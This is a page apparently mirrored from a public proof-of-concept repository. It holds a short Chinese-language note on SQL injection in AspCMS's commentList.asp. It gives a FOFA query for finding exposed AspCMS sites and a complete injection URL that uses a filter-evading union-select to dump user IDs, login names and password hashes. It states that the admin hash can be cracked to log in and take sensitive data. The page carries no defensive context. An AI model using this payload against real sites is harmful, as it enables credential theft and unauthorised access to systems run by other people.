admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/AspCMS/AspCMS系统commentList.asp存在SQL注入漏洞.md

17 lines
517 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# AspCMS系统commentList.asp存在SQL注入漏洞
AspCMS commentList.asp 存在SQL注入漏洞攻击者通过漏洞可以获取管理员md5的密码进行解密后登录获取敏感数据。
## fofa
```yaml
app="ASPCMS"
```
## poc
```asp
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
```
![image-20240619131305272](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408011120340.png)
Reference in New Issue Copy Permalink